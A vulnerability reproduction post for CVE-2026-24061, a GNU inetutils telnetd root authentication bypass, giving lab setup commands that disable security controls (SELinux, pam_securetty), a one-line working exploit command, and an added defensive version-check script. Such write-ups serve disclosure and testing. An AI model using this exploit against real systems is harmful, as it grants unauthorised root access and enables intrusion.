CVE-2026-24061

GNU inetutils telnetd remote authentication bypass vulnerability

https://mp.weixin.qq.com/s/PA5EhntsCyWfQT2kTE1yNA

https://www.openwall.com/lists/oss-security/2026/01/20/2

Vulnerability overview

CVE-2026-24061 is a serious vulnerability in GNU Inetutils version 2.7 that lets an attacker obtain a root shell without a password by passing the USER='-f root' parameter. This article walks through setting up and reproducing the vulnerability in a controlled environment.

Affected versions:

1.9.3 <= GNU Inetutils <= 2.7

Environment setup

# Install the build environment
sudo yum groupinstall "Development Tools" -y
sudo yum install ncurses-devel pam-devel -y

# Download and unpack the source code
cd /tmp
wget https://ftp.gnu.org/gnu/inetutils/inetutils-2.7.tar.gz
tar -xzf inetutils-2.7.tar.gz
cd inetutils-2.7

# Enable telnetd and disable the services we do not need
./configure \
  --prefix=/usr/local \
  --enable-telnetd \
  --disable-hostname \
  --disable-ping \
  --disable-ping6 \
  --disable-traceroute \
  --disable-rcp \
  --disable-rexec \
  --disable-rlogin \
  --disable-rsh \
  --disable-syslogd \
  --disable-talk \
  --disable-tftp \
  --disable-uucpd \
  --disable-ftp \
  --disable-ftpd

# Build and install
make -j$(nproc)
sudo make install

# Start the vulnerable service through xinetd
sudo yum install xinetd -y

# Create the /etc/xinetd.d/telnet file:
sudo tee /etc/xinetd.d/telnet <<EOF
service telnet
{
    disable         = no
    flags           = REUSE
    socket_type     = stream
    wait            = no
    user            = root
    server          = /usr/local/libexec/telnetd
    log_on_failure  += USERID
}
EOF

# Relax the security settings (root login on pseudo-terminals, pam_securetty, SELinux)
# Appending to /etc/securetty needs root, so the redirect goes through sudo tee
printf 'pts/0\npts/1\npts/2\npts/3\n' | sudo tee -a /etc/securetty
sudo sed -i 's/^auth.*pam_securetty.so/# &/' /etc/pam.d/login
sudo setenforce 0
sudo systemctl restart xinetd

Reproduction

USER='-f root' telnet -a 192.168.66.152
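As an added defensive check that is not part of the original post: a POSIX shell script that decides whether a reported Inetutils version falls inside the affected range given above and whether an xinetd telnet service file still leaves telnetd enabled. The `telnetd --version` output format and the sample inputs are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): defensive checks for CVE-2026-24061.
# Affected range from the advisory: 1.9.3 <= GNU Inetutils <= 2.7.
AFFECTED_MIN="1.9.3"
AFFECTED_MAX="2.7"

# version_cmp A B: print -1, 0 or 1 as A is <, = or > B, comparing
# dot-separated numeric fields; missing fields count as 0 (2.7 == 2.7.0).
version_cmp() {
    a="$1."; b="$2."
    while [ -n "$a" ] || [ -n "$b" ]; do
        x="${a%%.*}"; a="${a#*.}"
        y="${b%%.*}"; b="${b#*.}"
        if [ "${x:-0}" -lt "${y:-0}" ]; then printf '%s\n' -1; return; fi
        if [ "${x:-0}" -gt "${y:-0}" ]; then printf '%s\n' 1; return; fi
    done
    printf '%s\n' 0
}

# is_affected_version V: succeed when AFFECTED_MIN <= V <= AFFECTED_MAX.
is_affected_version() {
    [ "$(version_cmp "$AFFECTED_MIN" "$1")" -le 0 ] &&
    [ "$(version_cmp "$1" "$AFFECTED_MAX")" -le 0 ]
}

# inetutils_version_from_output TEXT: pull the version number out of
# `telnetd --version` output (assumed format: "telnetd (GNU inetutils) 2.7").
inetutils_version_from_output() {
    printf '%s\n' "$1" | sed -n 's/^telnetd (GNU inetutils) \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# xinetd_telnet_enabled FILE: succeed when the xinetd service file does not
# set "disable = yes", i.e. xinetd would still start telnetd.
xinetd_telnet_enabled() {
    ! grep -Eq '^[[:space:]]*disable[[:space:]]*=[[:space:]]*yes' "$1"
}

# Demonstration on constructed input (the version string is sample data).
SAMPLE_OUTPUT="telnetd (GNU inetutils) 2.7"
v="$(inetutils_version_from_output "$SAMPLE_OUTPUT")"
if is_affected_version "$v"; then
    echo "inetutils $v is within the affected range; upgrade or disable telnetd"
else
    echo "inetutils $v is outside the affected range"
fi
```

On a real host, feed the output of `telnetd --version` and the path `/etc/xinetd.d/telnet` to these functions instead of the sample values.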

By Lsec
Last updated Jan 22, 2026 14:50 +0800